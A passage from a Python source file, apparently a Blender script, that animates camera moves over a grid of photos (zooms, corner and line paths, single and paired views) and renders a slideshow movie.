cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom1, 0.01 + factorRandom1)
cam.location.z = pic.location.z + initZ1
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
'''
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ + 3.0
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2))
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2))
'''
cam.location.x = pic.location.x + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.y = pic.location.y + random.uniform(-0.01 - factorRandom2, 0.01 + factorRandom2)
cam.location.z = pic.location.z + initZ2
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration)
self.frame = self.frame + duration
def doAnimSlideshow (self, folderImages, time=None, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
bpy.context.scene.render.alpha_mode = 'TRANSPARENT'
#filepath imgBackground
#bpy.context.scene.node_tree.nodes['imgBackground'].filepath = '/home/jmramoss/Descargas/low-poly-abstract-background/background.jpg'
bpy.data.images['background'].filepath = '/home/jmramoss/Descargas/low-poly-abstract-background/background2.jpg'
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ folderImages = " + str(folderImages))
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)
sizeBorder = int(math.sqrt(numPhotos))
if time is None:
if sizeBorder > 4:
time = int(float(numPhotos) * 2.5)
else:
time = numPhotos * 3
rest = list()
for i in range(0, numPhotos):
pic = 'pic' + str((i+1))
rest.append(pic)
dataAnim = list()
#dataAnim.append({'type': 'zoom_in', 'time': 240})
#dataAnim.append({'type': 'zoom_out', 'time': 120})
#dataAnim.append({'type': 'corners', 'start': picCorner, 'end': picExtremo, 'time': 360})
#dataAnim.append({'type': 'line', 'start': picStart, 'end': picExtremo, 'time': 360})
#dataAnim.append({'type': 'one', 'pic': picOne, 'time': 120})
#dataAnim.append({'type': 'two', 'pic1': picOne, 'pic2': picTwo, 'time': 120})
#dataAnim.append({'type': 'two', 'pic1': picOne, 'pic2': picTwo, 'time': 120})
#dataAnim.append({'type': 'two', 'pic1': picOne, 'pic2': picTwo, 'time': 120})
#dataAnim.append({'type': 'two', 'pic1': picOne, 'pic2': picTwo, 'time': 120})
durationZoomIn = 240
durationZoomOut = 120
durationCorner = 760
durationLine = 560
durationTwoPhotos = 120
durationOnePhoto = 120
if sizeBorder == 6:
durationZoomIn = 240
durationZoomOut = 120
durationCorner = 760
durationLine = 560
elif sizeBorder == 5:
durationZoomIn = 192
durationZoomOut = 96
durationCorner = 700
durationLine = 500
elif sizeBorder == 4:
durationZoomIn = 144
durationZoomOut = 72
durationCorner = 640
durationLine = 440
elif sizeBorder == 3:
durationZoomIn = 72
durationZoomOut = 48
durationCorner = 580
durationLine = 380
elif sizeBorder == 2:
durationZoomIn = 72
durationZoomOut = 48
durationCorner = 520
durationLine = 320
picZoomIn = int(numPhotos / 2)
picZoomOut = picZoomIn + 1
if sizeBorder == 6:
picZoomIn = 15
picZoomOut = 22
elif sizeBorder == 5:
picZoomIn = 12
picZoomOut = 14
elif sizeBorder == 4:
picZoomIn = 6
picZoomOut = 11
elif sizeBorder == 3:
picZoomIn = 4
picZoomOut = 6
elif sizeBorder == 3:
picZoomIn = 1
picZoomOut = 4
picZoomInName = 'pic' + str(picZoomIn)
picZoomOutName = 'pic' + str(picZoomOut)
if picZoomInName in rest:
rest.remove(picZoomInName)
if picZoomOutName in rest:
rest.remove(picZoomOutName)
if sizeBorder > 3:
#corner
picCorners = self.getCornerPictures()
picCorner = random.choice(picCorners)
picExtremo = self.getPicExtremoCorner(picCorner)
if picCorner in picCorners:
picCorners.remove(picCorner)
if picExtremo in picCorners:
picCorners.remove(picExtremo)
if picCorner in rest:
rest.remove(picCorner)
if picExtremo in rest:
rest.remove(picExtremo)
picMiddle = self.getPicMiddle(picCorner, picExtremo)
for itemMiddle in picMiddle:
if itemMiddle in rest:
rest.remove(itemMiddle)
dataAnim.append({'type': 'corners', 'start': picCorner, 'end': picExtremo, 'time': durationCorner, 'zoom': 1})
if sizeBorder >= 5:
vecinosCorner = self.getPicVecinosCorner(picCorner, picExtremo)
for itemVecino in picMiddle:
if itemVecino in rest:
rest.remove(itemVecino)
#self.showLinePhotos(duration=360, picNameStart=picCorner, picNameEnd=picExtremo, zoom=2)
if sizeBorder > 3:
#line
allBorders = self.getExternPictures()
picBorders = list()
for pic in allBorders:
if pic not in picCorners:
picBorders.append(pic)
#picBorders = [x for x in self.getExternPictures() if x not in picCorners]
picStart = random.choice(picBorders)
picExtremo = self.getPicExtremo(picStart)
if picStart in picBorders:
picBorders.remove(picStart)
if picExtremo in picBorders:
picBorders.remove(picExtremo)
if picStart in rest:
rest.remove(picStart)
if picExtremo in rest:
rest.remove(picExtremo)
picMiddle = self.getPicMiddle(picStart, picExtremo)
for itemMiddle in picMiddle:
if itemMiddle in rest:
rest.remove(itemMiddle)
dataAnim.append({'type': 'line', 'start': picStart, 'end': picExtremo, 'time': durationLine, 'zoom': 0})
#self.showLinePhotos(duration=360, picNameStart=picStart, picNameEnd=picExtremo, zoom=1)
numPendientes = len(rest)
numParejas = int((1.0/3.0)*numPendientes)
numIndividuales = numPendientes - (2*numParejas)
while numParejas > 0:
item = random.choice(rest)
masCercana = self.getPhotoMasCercana(item, rest)
if item is not None and masCercana is not None:
if item in rest:
rest.remove(item)
if masCercana in rest:
rest.remove(masCercana)
dataAnim.append({'type': 'two', 'pic1': item, 'pic2': masCercana, 'time': durationTwoPhotos})
numParejas -= 1
numIndividuales += (2*numParejas)
while numIndividuales > 0:
item = random.choice(rest)
if item is not None:
if item in rest:
rest.remove(item)
dataAnim.append({'type': 'one', 'pic': item, 'time': durationOnePhoto})
numIndividuales -= 1
#self.showDeleiteOnePhoto(duration=120, picName='pic1')
#dataAnim.append({'type': 'one', 'pic': 'pic1', 'time': 120})
#self.showDeleiteTwoPhotos(duration=120, picName1='pic1', picName2='pic2')
#dataAnim.append({'type': 'two', 'pic1': 'pic1', 'pic2': 'pic12', 'time': 120})
if time is not None:
totalTimeFrames = 0
totalTimeFrames += durationZoomIn
for itemAnim in dataAnim:
totalTimeFrames += itemAnim['time']
totalTimeFrames += durationZoomOut
maxTimeFrames = time * 24
if totalTimeFrames != maxTimeFrames:
porcentaje = float(maxTimeFrames) / float(totalTimeFrames)
durationZoomIn = int(porcentaje * float(durationZoomIn))
durationZoomOut = int(porcentaje * float(durationZoomOut))
for itemAnim in dataAnim:
itemAnim['time'] = int(porcentaje * float(itemAnim['time']))
#zoom in
self.showAllPhotosPicZoomIn(picName=picZoomInName, duration=durationZoomIn)
while len(dataAnim) > 0:
itemAnim = random.choice(dataAnim)
if itemAnim['type'] == 'corners':
self.showLinePhotosGroup(duration=itemAnim['time'], picNameStart=itemAnim['start'], picNameEnd=itemAnim['end'], zoom=itemAnim['zoom'], groupStart=self.get4PicsCorner(itemAnim['start']), groupEnd=self.get4PicsCorner(itemAnim['end']))
elif itemAnim['type'] == 'line':
self.showLinePhotosGroup(duration=itemAnim['time'], picNameStart=itemAnim['start'], picNameEnd=itemAnim['end'], zoom=itemAnim['zoom'], groupStart=None, groupEnd=None)
elif itemAnim['type'] == 'one':
self.showDeleiteOnePhoto(duration=itemAnim['time'], picName=itemAnim['pic'])
elif itemAnim['type'] == 'two':
self.showDeleiteTwoPhotos(duration=itemAnim['time'], picName1=itemAnim['pic1'], picName2=itemAnim['pic2'])
if itemAnim in dataAnim:
dataAnim.remove(itemAnim)
#zoom out
self.showAllPhotosPicZoomOut(picName=picZoomOutName, duration=durationZoomOut)
frameEnd = self.frame
#frameEnd = 120
#frameEnd = numPhotos * 120
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def getPhotoMasCercana (self, pivot, listado):
result = None
curDistance = 99999999999
for item in listado:
if item != pivot:
distance = self.getPhotoDistance(pivot, item)
if distance < curDistance:
result = item
curDistance = distance
return result
def getPhotoDistance (self, item1, item2):
result = None
if item1 is not None and item2 is not None:
import bpy
pic1 = bpy.data.objects[item1]
pic2 = bpy.data.objects[item2]
result = math.sqrt(math.pow((pic1.location.x - pic2.location.x), 2) + math.pow((pic1.location.y - pic2.location.y), 2) + math.pow((pic1.location.z - pic2.location.z), 2))
return result
def doAnimSceneDeleiteAllPhotos (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ folderImages = " + str(folderImages))
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)
'''
for i in range(0, numPhotos):
#startIdx = random.randint(1, numPhotos)
startIdx = i + 1
picName = 'pic' + str(startIdx)
#self.showDeleiteOnePhoto(duration=120, picName=picName)
self.showDeleiteDuration(duration=240, picName=picName)
'''
'''
for i in range(0, numPhotos):
#startIdx = random.randint(1, numPhotos)
startIdx = i + 1
picNameStart = 'pic' + str(startIdx)
for j in range(0, numPhotos):
endIdx = j + 1
picNameEnd = 'pic' + str(endIdx)
if i != j:
self.showLinePhotos(duration=120, picNameStart=picNameStart, picNameEnd=picNameEnd)
'''
'''
for i in range(0, numPhotos):
startIdx = i + 1
picNameStart = 'pic' + str(startIdx)
for j in range(0, numPhotos):
endIdx = j + 1
picNameEnd = 'pic' + str(endIdx)
if i != j:
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
distance = self.distancePic2Line2Pics(picDistance, picNameStart, picNameEnd)
print("start = " + picNameStart + " end = " + picNameEnd + " distance " + str(distance) + " to " + picDistance)
picBorders = self.getExternPictures()
for pic1 in picBorders:
for pic2 in picBorders:
if pic1 != pic2:
pendiente = self.getPendiente2Pics(pic1, pic2)
pendiente = pendiente if pendiente is not None else 'None'
print('pendiente = ' + str(pendiente) + " pics = " + pic1 + "+" + pic2)
picBorders = self.getExternPictures()
print("borders = " + str(picBorders))
for pic1 in picBorders:
print("for " + pic1 + " extremo is = " + str(self.getPicExtremo(pic1)))
#print("for pic2 extremo is = " + str(self.getPicExtremo('pic2')))
'''
'''
picBorders = self.getExternPictures()
for picBorder1 in picBorders:
picExtremo = self.getPicExtremo(picBorder1)
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
distance = self.distancePic2Line2Pics(picDistance, picBorder1, picExtremo)
if distance < 0.5:
print("start = " + picBorder1 + " end = " + picExtremo + " distance " + str(distance) + " to " + picDistance)
'''
rest = list()
for i in range(0, numPhotos):
pic = 'pic' + str((i+1))
rest.append(pic)
'''
maxTry3 = 10
picBorders = self.getExternPictures()
while len(rest) > 0 and maxTry3 > 0:
picBorder = None
picExtremo = None
maxTry2 = 10
while maxTry2 > 0:
picBorder = None
maxTry = 10
while maxTry > 0:
picBorder = random.choice(picBorders)
if picBorder in rest:
break
maxTry -= 1
if picBorder is not None:
picExtremo = self.getPicExtremo(picBorder)
if picExtremo in rest:
break
maxTry2 -= 1
if picBorder is not None and picExtremo is not None:
picMiddle = self.getPicMiddle(picBorder, picExtremo)
valid = True if len(picMiddle) <= 0 else False
for itemMiddle in picMiddle:
if itemMiddle in rest:
valid = True
break
if valid:
if picBorder in rest:
rest.remove(picBorder)
if picExtremo in rest:
rest.remove(picExtremo)
for itemMiddle in picMiddle:
if itemMiddle in rest:
rest.remove(itemMiddle)
else:
maxTry3 -= 1
self.showLinePhotos(duration=120, picNameStart=picBorder, picNameEnd=picExtremo)
else:
maxTry3 -= 1
'''
'''
maxTry3 = 10
#picBorders = self.getExternPictures()
picBorders = self.getCornerPictures()
while len(rest) > 0 and maxTry3 > 0:
line = self.selectLinePath(rest, picBorders)
if line is None:
maxTry3 -= 1
else:
print("rest = " + str(rest))
print("line = " + str(line))
self.showLinePhotos(duration=48, picNameStart=line[0], picNameEnd=line[1])
'''
'''
for zoom in range(1, 4):
picCorners = self.getCornerPictures()
for i in range(0, 2):
picCorner = random.choice(picCorners)
picExtremo = self.getPicExtremoCorner(picCorner)
picCorners.remove(picCorner)
picCorners.remove(picExtremo)
self.showLinePhotos(duration=240, picNameStart=picCorner, picNameEnd=picExtremo, zoom=zoom)
'''
self.showAllPhotos(duration=120, zoom=True)
self.showAllPhotos(duration=120, zoom=False)
frameEnd = self.frame
#frameEnd = numPhotos * 120
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def selectLinePath (self, rest, picBorders=None):
result = None
maxTry3 = 10
picBorders = self.getExternPictures() if picBorders is None else picBorders
#print("strssssss" + str(picBorders))
while maxTry3 > 0:
picBorder = None
picExtremo = None
maxTry2 = 10
while maxTry2 > 0:
picBorder = None
maxTry = 10
while maxTry > 0:
picBorder = random.choice(picBorders)
if picBorder in rest:
break
picBorder = None
maxTry -= 1
if picBorder is not None:
picExtremo = self.getPicExtremo(picBorder)
if picExtremo in rest and picExtremo in picBorders:
break
picExtremo = None
maxTry2 -= 1
if picBorder is not None and picExtremo is not None:
picMiddle = self.getPicMiddle(picBorder, picExtremo)
valid = True if len(picMiddle) <= 0 else False
for itemMiddle in picMiddle:
if itemMiddle in rest:
valid = True
break
if valid:
if picBorder in rest:
rest.remove(picBorder)
if picExtremo in rest:
rest.remove(picExtremo)
for itemMiddle in picMiddle:
if itemMiddle in rest:
rest.remove(itemMiddle)
result = (picBorder, picExtremo)
#self.showLinePhotos(duration=120, picNameStart=picBorder, picNameEnd=picExtremo)
break
else:
maxTry3 -= 1
else:
maxTry3 -= 1
return result
def getPicMiddle (self, picStart, picEnd):
result = list()
numPhotos = len(self.slideshow.photos)
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
if picDistance != picStart and picDistance != picEnd:
distance = self.distancePic2Line2Pics(picDistance, picStart, picEnd)
if distance < 0.5:
#print("start = " + picBorder1 + " end = " + picExtremo + " distance " + str(distance) + " to " + picDistance)
result.append(picDistance)
return result
def getPicVecinosCorner (self, picStart, picEnd):
result = list()
numPhotos = len(self.slideshow.photos)
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
if picDistance != picStart and picDistance != picEnd:
distance = self.distancePic2Line2Pics(picDistance, picStart, picEnd)
#print("start = " + picStart + " end = " + picEnd + " distance " + str(distance) + " to " + picDistance)
if distance > 0.5 and distance < 1.0:
#print("start = " + picBorder1 + " end = " + picExtremo + " distance " + str(distance) + " to " + picDistance)
result.append(picDistance)
return result
def get4PicsCorner(self, picName):
result = list()
result.append(picName)
numPhotos = len(self.slideshow.photos)
for k in range(0, numPhotos):
picDistance = 'pic' + str((k+1))
if picDistance != picName:
distance = self.distance2Pics(picDistance, picName)
print("picDistance = " + picDistance + " distance " + str(distance) + " to " + picName)
if distance < 1.65:
#print("start = " + picBorder1 + " end = " + picExtremo + " distance " + str(distance) + " to " + picDistance)
result.append(picDistance)
#print(str(result))
#quit()
return result
def getPicExtremo (self, picName):
result = None
if picName is not None:
picIdx = int(picName[3:]) - 1
numPhotos = len(self.slideshow.photos)
sizeBorder = int(math.sqrt(numPhotos))
idxCorner1 = 0
idxCorner2 = (sizeBorder - 1)
idxCorner3 = (numPhotos - 1)
idxCorner4 = (numPhotos - sizeBorder)
div = int(picIdx / sizeBorder)
div1 = int((picIdx + 1) / sizeBorder)
mod = int(picIdx % sizeBorder)
mod1 = int((picIdx + 1) % sizeBorder)
corner = True if (picIdx == idxCorner1 or picIdx == idxCorner2 or picIdx == idxCorner3 or picIdx == idxCorner4) else False
vertical = True if div == 0 or div == (sizeBorder - 1) else False
horizontal = True if mod == 0 or mod1 == 0 else False
'''
print("picIdx = " + str(picIdx))
print("numPhotos = " + str(numPhotos))
print("sizeBorder = " + str(sizeBorder))
print("corner = " + str(corner))
print("vertical = " + str(vertical))
print("horizontal = " + str(horizontal))
print("div = " + str(picIdx / sizeBorder))
print("mod = " + str(picIdx % sizeBorder))
'''
resultIdx = None
if corner:
listCorners = [idxCorner1, idxCorner2, idxCorner3, idxCorner4]
listCorners.remove(picIdx)
resultIdx = random.choice(listCorners)
elif vertical:
resultIdx = picIdx + (numPhotos - sizeBorder) if picIdx < sizeBorder else picIdx - (numPhotos - sizeBorder)
elif horizontal:
resultIdx = picIdx + (sizeBorder - 1) if mod == 0 else picIdx - (sizeBorder - 1)
if resultIdx is not None:
result = 'pic' + str((resultIdx + 1))
return result
def getPicExtremoCorner (self, picName):
result = None
if picName is not None:
picIdx = int(picName[3:]) - 1
numPhotos = len(self.slideshow.photos)
sizeBorder = int(math.sqrt(numPhotos))
idxCorner1 = 0
idxCorner2 = (sizeBorder - 1)
idxCorner3 = (numPhotos - 1)
idxCorner4 = (numPhotos - sizeBorder)
valid = False
valid = valid or (picIdx == idxCorner1)
valid = valid or (picIdx == idxCorner2)
valid = valid or (picIdx == idxCorner3)
valid = valid or (picIdx == idxCorner4)
if valid:
resultIdx = None
resultIdx = idxCorner1 if picIdx == idxCorner3 else resultIdx
resultIdx = idxCorner3 if picIdx == idxCorner1 else resultIdx
resultIdx = idxCorner2 if picIdx == idxCorner4 else resultIdx
resultIdx = idxCorner4 if picIdx == idxCorner2 else resultIdx
if resultIdx is not None:
result = 'pic' + str((resultIdx + 1))
return result
def getPendiente2Pics (self, picName1, picName2):
result = None
if picName1 is not None and picName2 is not None:
import bpy
pic1 = bpy.data.objects[picName1]
pic2 = bpy.data.objects[picName2]
try:
result = (pic2.location.y - pic1.location.y) / (pic2.location.x - pic1.location.x)
except:
pass
return result
def distancePic2Line2Pics (self, picName, picNameStart, picNameEnd):
result = None
if picName is not None and picNameStart is not None and picNameEnd is not None:
import bpy
pic = bpy.data.objects[picName]
picStart = bpy.data.objects[picNameStart]
picEnd = bpy.data.objects[picNameEnd]
point = (pic.location.x, pic.location.y)
linePoint1 = (picStart.location.x, picStart.location.y)
linePoint2 = (picEnd.location.x, picEnd.location.y)
result = self.distancePoint2Line2P(point, linePoint1, linePoint2)
return result
def distance2Pics (self, picName1, picName2):
result = None
if picName1 is not None and picName2 is not None:
import bpy
pic1 = bpy.data.objects[picName1]
pic2 = bpy.data.objects[picName2]
result = math.sqrt(math.pow((pic2.location.x - pic1.location.x), 2) + math.pow((pic2.location.y - pic1.location.y), 2))
return result
def distancePoint2Line2P (self, point, linePoint1, linePoint2):
result = None
if point is not None and linePoint1 is not None and linePoint2 is not None:
#recta y = mx + b
mPendiente = (linePoint2[1] - linePoint1[1]) / (linePoint2[0] - linePoint1[0])
b = linePoint1[1] - (mPendiente * linePoint1[0])
distance = (math.fabs((mPendiente*point[0]) - point[1] + b)) / (math.sqrt(math.pow(mPendiente, 2) + 1))
result = distance
return result
def getCornerPictures (self):
result = None
numPhotos = len(self.slideshow.photos)
sizeBorder = int(math.sqrt(numPhotos))
picCorner1 = 'pic1'
picCorner2 = 'pic' + str(sizeBorder)
picCorner3 = 'pic' + str(numPhotos)
picCorner4 = 'pic' + str(numPhotos - sizeBorder + 1)
result = [picCorner1, picCorner2, picCorner3, picCorner4]
return result
def getExternPictures (self):
result = None
numPhotos = len(self.slideshow.photos)
print("numPhotos = " + str(numPhotos))
sizeBorder = int(math.sqrt(numPhotos))
print("sizeBorder = " + str(sizeBorder))
result = list()
for i in range(0, numPhotos):
col = int(i / sizeBorder)
print("col = " + str(col))
valid = False
if col == 0:
valid = True
elif col == (sizeBorder - 1):
valid = True
elif (i % sizeBorder) == 0 or ((i + 1) % sizeBorder) == 0:
valid = True
if valid:
picName = 'pic' + str((i + 1))
result.append(picName)
return result
def doAnimSceneSequential (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ folderImages = " + str(folderImages))
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)
#print("NUM PHOTOS = " + str(numPhotos))
for i in range(0, numPhotos):
#startIdx = random.randint(1, numPhotos)
startIdx = i + 1
picName = 'pic' + str(startIdx)
self.showSequentialPhoto(picName, duration=120)
#print("EXTERN PICTURES = " + str(self.getExternPictures()))
frameEnd = self.frame
#frameEnd = numPhotos * 120
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def showSequentialPhoto (self, picName, duration=120):
import bpy
cam = bpy.data.objects['Camera'] # bpy.types.Camera
pic = bpy.data.objects[picName]
initZ = 2.5
cam.rotation_mode = 'XYZ'
cam.location.x = pic.location.x + random.uniform(-0.01, 0.01)
cam.location.y = pic.location.y + random.uniform(-0.01, 0.01)
cam.location.z = pic.location.z + initZ
cam.rotation_euler[0] = random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 3.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame)
cam.location.x = pic.location.x + random.uniform(-0.001, 0.001)
cam.location.y = pic.location.y + random.uniform(-0.001, 0.001)
cam.location.z = pic.location.z + initZ + 0.01
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + math.ceil(duration/2) - 6)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + math.ceil(duration/2) - 6)
cam.location.x = pic.location.x + random.uniform(-0.001, 0.001)
cam.location.y = pic.location.y + random.uniform(-0.001, 0.001)
cam.location.z = pic.location.z + initZ - 0.01
cam.rotation_euler[0] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[1] = 0.0*random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.rotation_euler[2] = random.uniform(0.0, 1.0)*(math.pi/180.0)
cam.keyframe_insert(data_path="location", frame=self.frame + duration - 6)
cam.keyframe_insert(data_path="rotation_euler", frame=self.frame + duration - 6)
self.frame = self.frame + duration
def doAnimSceneDuration (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
print("$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ folderImages = " + str(folderImages))
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)#16
frameEnd = 8 * 120
#renderOneFrame(50)
self.showDeleiteDuration(duration=120)
self.showDeleiteDuration(duration=120)
self.showZoomInOutDuration(duration=120)
self.showZoomInOutDuration(duration=120)
self.showRowColumnDuration(duration=120)
self.showRowColumnDuration(duration=120)
self.showSlideshowDuration(duration=120)
self.showSlideshowDuration(duration=120)
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def doAnimScene (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)#16
pps = 1.0
fps = self.fps
frameEnd = numPhotos * pps * fps
#renderOneFrame(50)
self.showDeleite(numPhotos, frameEnd)
self.showDeleite(numPhotos, frameEnd)
self.showZoomInOut(numPhotos, frameEnd)
self.showZoomInOut(numPhotos, frameEnd)
self.showRowColumn(numPhotos, frameEnd)
self.showRowColumn(numPhotos, frameEnd)
self.showSlideshow(numPhotos, frameEnd)
self.showSlideshow(numPhotos, frameEnd)
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def doAnimSceneTitle (self, folderImages, movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
numPhotos = len(self.slideshow.photos)#16
pps = 1.0
fps = self.fps
frameEnd = numPhotos * pps * fps
#renderOneFrame(50)
self.showDeleite(numPhotos, frameEnd)
self.showZoomInOut(numPhotos, frameEnd)
self.showDeleite(numPhotos, frameEnd)
result = self.saveMovie(frameStart=1, frameEnd=frameEnd, movieOutput=movieOutput)
return result
def animSceneDuration (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "animSceneDuration", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimSceneDuration(folderImages, movieOutput)
return result
def animSceneSequential (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "animSceneSequential", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimSceneSequential(folderImages, movieOutput)
return result
def animSceneDeleiteAllPhotos (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "animSceneDeleiteAllPhotos", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimSceneDeleiteAllPhotos(folderImages, movieOutput)
return result
def animSlideshow (self, folderImages, time=None, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty_background.blend', 'templates')
result = self.runMethodBlender(templatePath, "animSlideshow", [folderImages, time], movieOutput=movieOutput)
else:
result = self.doAnimSlideshow(folderImages, time, movieOutput)
return result
def animScene (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "animScene", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimScene(folderImages, movieOutput)
return result
def animSceneTitle (self, folderImages, movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty.blend', 'templates')
result = self.runMethodBlender(templatePath, "doAnimSceneTitle", [folderImages], movieOutput=movieOutput)
else:
result = self.doAnimSceneTitle(folderImages, movieOutput)
return result
def animSceneTitleItem (self, folderImages, durationFrames=120, mode='project', movieOutput=None):
result = None
if self.blender:
templatePath = self.getResource('empty_background.blend', 'templates')
result = self.runMethodBlender(templatePath, "doAnimSceneTitleItem", [folderImages, durationFrames, mode], movieOutput=movieOutput)
else:
result = self.doAnimSceneTitleItem(folderImages=folderImages, durationFrames=durationFrames, mode=mode, movieOutput=movieOutput)
return result
def doAnimSceneTitleItem (self, folderImages, durationFrames=120, mode='project', movieOutput=None):
import bpy
result = None
bpy.context.scene.world.light_settings.use_ambient_occlusion = True
bpy.context.scene.world.light_settings.ao_factor = 1.0
bpy.context.scene.render.alpha_mode = 'TRANSPARENT'
#filepath imgBackground
#bpy.context.scene.node_tree.nodes['imgBackground'].filepath = '/home/jmramoss/Descargas/low-poly-abstract-background/background.jpg'
bpy.data.images['background'].filepath = '/home/jmramoss/Descargas/low-poly-abstract-background/background2.jpg'
self.buildScene(folderImages)
#camLookAt()0
self.camRotate(0, 0, 0)
#showPicture('pic2')
#renderOneFrame(50)
if mode == 'project':
self.showDeleiteOnePhotoProject(durationFrames)
elif mode == 'section':
self.showDeleiteOnePhotoSection(durationFrames)
else:
self.showDeleiteOnePhoto(durationFrames)
result = self.saveMovie(frameStart=1, frameEnd=durationFrames, movieOutput=movieOutput)
return result
if __name__ == '__main__':
director = Director()
director.runMode = 'LOW'
director.verbose = True
director.forceFullRender = True
director.sortPhotos = True
#director.forceFrameEnd = 6
#out = director.animScene("/media/jmramoss/ALMACEN/unai_colegio_primaria/Tutoria_1A_2017_2018/01_21dic17_bailamos/.bak2")
#print(str(out))
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/4x4")
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/5x5")
#out = director.animSceneDuration("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/3x2")
